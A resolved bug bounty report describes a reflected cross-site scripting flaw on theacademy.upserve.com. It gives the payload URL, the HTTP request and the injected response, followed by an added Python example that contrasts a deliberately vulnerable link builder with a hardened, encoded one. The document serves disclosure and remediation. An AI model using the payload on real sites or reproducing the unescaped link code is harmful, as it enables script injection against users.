[theacademy.upserve.com] Reflected XSS Query-String
Low
Upserve
Team Summary
Official summary from Upserve
The reporter discovered an unauthenticated reflected cross-site scripting vulnerability in theacademy.upserve.com by setting the XSS payload as a GET parameter.
Reported by
bobrov
Vulnerability Details
Technical details and impact analysis
**Steps To Reproduce:**
Open the URL in Firefox:
```
https://theacademy.upserve.com/roles/?%22%3E%3Cscript//src=data:,alert(location)//
```
**HTTP Request**
```http
GET /roles/?%22%3E%3Cscript//src=data:,alert(location)// HTTP/1.1
Host: theacademy.upserve.com
```
**HTTP Response**
```html
<a class="category dropdown-item name-sort sorting-desc" href="/roles/?"><script//src=data:,alert(location)//&orderby=name&order=DESC">Name</a>
<a class="category dropdown-item views-sort " href="/roles/?"><script//src=data:,alert(location)//&orderby=views&order=DESC" >Views</a>
<a class="category dropdown-item duration-sort " href="/roles/?"><script//src=data:,alert(location)//&orderby=duration&order=DESC">Duration</a>
```
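The three anchor tags above show the query string spliced into an `href` attribute with no encoding, which is why `">` terminates the attribute and the `<script` that follows lands in tag context. The Python below is an added example, not part of this report or of Upserve's code: it reconstructs that template logic beside a hardened version (parameter allowlist plus URL and attribute encoding) and a regression check, using a constructed sample query and a hypothetical `ALLOWED_PARAMS` set.

```python
from html import escape
from urllib.parse import parse_qsl, urlencode

# Constructed sample input: the report's payload after URL-decoding,
# i.e. what the server sees as the query string of /roles/.
RAW_QUERY = '"><script//src=data:,alert(location)//'

# Hypothetical allowlist of parameters the sort links are meant to carry.
ALLOWED_PARAMS = {"orderby", "order", "q"}


def vulnerable_sort_link(raw_query: str, orderby: str) -> str:
    """Mirror of the bug in the report: the raw query string is concatenated
    into the href attribute verbatim, so a double quote ends the attribute
    and the rest of the input is parsed as markup."""
    return (f'<a class="category dropdown-item {orderby}-sort" '
            f'href="/roles/?{raw_query}&orderby={orderby}&order=DESC">'
            f'{orderby.title()}</a>')


def safe_sort_link(raw_query: str, orderby: str) -> str:
    """Hardened form: parse the query, keep only known parameters, rebuild it
    with urlencode (percent-encodes every value), then HTML-escape the whole
    value before it is placed inside a quoted attribute."""
    params = {k: v for k, v in parse_qsl(raw_query, keep_blank_values=True)
              if k in ALLOWED_PARAMS}
    params["orderby"] = orderby
    params["order"] = "DESC"
    href = "/roles/?" + urlencode(params)
    return (f'<a class="category dropdown-item {escape(orderby, quote=True)}-sort" '
            f'href="{escape(href, quote=True)}">{escape(orderby.title())}</a>')


def payload_reflected_unescaped(body: str, payload: str) -> bool:
    """Regression check for a captured response body: True if the decoded
    payload appears byte-for-byte, i.e. nothing encoded it on the way out."""
    return payload in body


if __name__ == "__main__":
    print("vulnerable:", vulnerable_sort_link(RAW_QUERY, "name"))
    print("hardened:  ", safe_sort_link(RAW_QUERY, "name"))
    print("hardened (allowed param):", safe_sort_link("q=" + RAW_QUERY, "views"))
```

Running the hardened builder against the reported URL drops the unknown parameter entirely, and even when the same value arrives under an allowed name it comes out percent-encoded inside an HTML-escaped attribute, so the regression check no longer finds the raw payload.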
## Impact
Reflected XSS
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Bounty
$250.00
Weakness
Cross-site Scripting (XSS) - Reflected